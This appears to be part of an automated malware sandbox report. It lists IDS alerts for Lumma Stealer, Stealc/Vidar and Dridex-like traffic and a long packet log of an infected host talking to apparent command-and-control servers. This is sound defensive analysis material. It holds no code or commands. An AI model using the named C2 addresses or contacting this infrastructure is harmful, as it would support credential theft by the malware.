2024-09-27T00:15:18.168845+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49779	172.67.208.139	443	TCP
2024-09-27T00:15:18.168845+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49779	172.67.208.139	443	TCP
2024-09-27T00:15:20.558599+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49781	172.67.128.144	443	TCP
2024-09-27T00:15:20.558599+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49781	172.67.128.144	443	TCP
2024-09-27T00:15:35.086446+0200	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49783	104.26.13.205	80	TCP
2024-09-27T00:15:41.429971+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49787	5.75.211.162	443	TCP
2024-09-27T00:15:42.919658+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49788	5.75.211.162	443	TCP
2024-09-27T00:15:44.282336+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49789	5.75.211.162	443	TCP
2024-09-27T00:15:45.645028+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49790	5.75.211.162	443	TCP
2024-09-27T00:15:46.345317+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	5.75.211.162	443	192.168.2.4	49790	TCP
2024-09-27T00:15:46.991366+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49791	5.75.211.162	443	TCP
2024-09-27T00:15:47.697227+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	5.75.211.162	443	192.168.2.4	49791	TCP
2024-09-27T00:15:48.434558+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49792	5.75.211.162	443	TCP
2024-09-27T00:15:49.449684+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49793	5.75.211.162	443	TCP
2024-09-27T00:15:52.774428+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49794	5.75.211.162	443	TCP
2024-09-27T00:15:53.759540+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.4	49795	5.75.211.162	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 00:14:26.445635080 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:26.445672035 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:26.445838928 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:26.504301071 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:26.504327059 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.147586107 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.147851944 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.315742016 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.315773964 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.316253901 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.316366911 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.366628885 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.407406092 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.786350965 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.786375046 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.786387920 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.786540985 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.786555052 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.786600113 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.891187906 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.891211987 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.891295910 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.891295910 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.891309023 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.891401052 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.900458097 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.900563955 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.900599003 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.900635958 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.900980949 CEST	49739	443	192.168.2.4	104.102.49.254
Sep 27, 2024 00:14:27.900994062 CEST	443	49739	104.102.49.254	192.168.2.4
Sep 27, 2024 00:14:27.911252975 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:27.911315918 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:27.911411047 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:27.911685944 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:27.911705017 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:28.857217073 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:28.857368946 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:28.860929012 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:28.860939026 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:28.861196995 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:28.861257076 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:28.861608028 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:28.903404951 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:29.359797001 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:29.359978914 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:29.360027075 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:29.360047102 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:29.362205029 CEST	49740	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:29.362220049 CEST	443	49740	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:29.364593029 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:29.364624023 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:29.364722013 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:29.365035057 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:29.365046978 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.047175884 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.047301054 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.048105955 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.048113108 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.049752951 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.049760103 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.756894112 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.756978989 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.757024050 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.757024050 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.757435083 CEST	49741	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.757450104 CEST	443	49741	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.759418011 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.759440899 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:30.759623051 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.759989977 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:30.759999037 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:31.424307108 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:31.424413919 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:31.424855947 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:31.424865007 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:31.427110910 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:31.427118063 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.133050919 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.133096933 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.133230925 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.133357048 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.133357048 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.133357048 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.134823084 CEST	49742	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.134835958 CEST	443	49742	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.135627031 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.135665894 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.135736942 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.135968924 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.135982990 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.792817116 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.792949915 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.793565035 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.793576002 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:32.795480013 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:32.795485020 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:33.488488913 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:33.488516092 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:33.488571882 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:33.488576889 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:33.488595963 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:33.488643885 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:33.489023924 CEST	49743	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:33.489039898 CEST	443	49743	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:33.490787983 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:33.490827084 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:33.490919113 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:33.491152048 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:33.491173983 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.149432898 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.149527073 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.150264978 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.150278091 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.152430058 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.152436972 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.838385105 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.838455915 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.838488102 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.838502884 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.838545084 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.838560104 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.838681936 CEST	49744	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.838700056 CEST	443	49744	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.906521082 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.906567097 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:34.906660080 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.906874895 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:34.906896114 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:35.560719967 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:35.562421083 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:35.562977076 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:35.562994957 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:35.564766884 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:35.564773083 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:35.564821959 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:35.564847946 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:35.899736881 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:35.899785995 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:35.899904966 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:35.900243044 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:35.900279999 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:36.337163925 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:36.337270975 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:36.337300062 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:36.337338924 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:36.337352037 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:36.337392092 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:36.338334084 CEST	49745	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:36.338351011 CEST	443	49745	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:36.581496000 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:36.581588984 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:36.582218885 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:36.582230091 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:36.583991051 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:36.584002972 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.021393061 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.021454096 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.021512032 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.021637917 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.021662951 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.021677971 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.021724939 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.052778959 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.052800894 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.052915096 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.052927017 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.052949905 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.052973032 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.119308949 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.119362116 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.119481087 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.119504929 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.119517088 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.119549036 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.150248051 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.150294065 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.150363922 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.150377035 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.150408030 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.150422096 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.188200951 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.188297987 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.188350916 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.188364983 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.188402891 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.188419104 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.219180107 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.219228983 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.219265938 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.219294071 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.219310045 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.219645023 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.238688946 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.238735914 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.238763094 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.238787889 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.238806009 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.238832951 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.257195950 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.257220030 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.257273912 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.257301092 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.257316113 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.257343054 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.274967909 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.274988890 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.275049925 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.275063038 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.275085926 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.275109053 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.291843891 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.291891098 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.291938066 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.291953087 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.291970015 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.296200037 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.307729006 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.307776928 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.307822943 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.307837963 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.307856083 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.307873964 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.321171045 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.321229935 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.321244955 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.321257114 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.321289062 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.321305037 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.335820913 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.335863113 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.335917950 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.335930109 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.335942984 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.335968018 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.347492933 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.347536087 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.347585917 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.347609043 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.347625971 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.347650051 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.356112003 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.356131077 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.356223106 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.356240988 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.356287956 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.365719080 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.365740061 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.365827084 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.365849018 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.365896940 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.374614954 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.374634981 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.374701023 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.374711990 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.374757051 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.384205103 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.384253979 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.384282112 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.384291887 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.384310961 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.384331942 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.394639015 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.394680023 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.394716024 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.394725084 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.394748926 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.394768953 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.408755064 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.408796072 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.408833027 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.408881903 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.408912897 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.408926964 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.424168110 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.424232960 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.424303055 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.424321890 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.424348116 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.424369097 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.436219931 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.436263084 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.436323881 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.436347961 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.436361074 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.436386108 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.446037054 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.446089983 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.446150064 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.446163893 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.446186066 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.446219921 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.455538988 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.455615044 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.455648899 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.455661058 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.455696106 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.455714941 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.462960005 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.463006020 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.463035107 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.463042974 CEST	443	49746	5.75.211.162	192.168.2.4
Sep 27, 2024 00:14:37.463203907 CEST	49746	443	192.168.2.4	5.75.211.162
Sep 27, 2024 00:14:37.463203907 CEST	49746	443	192.168.2.4	5.75.211.162
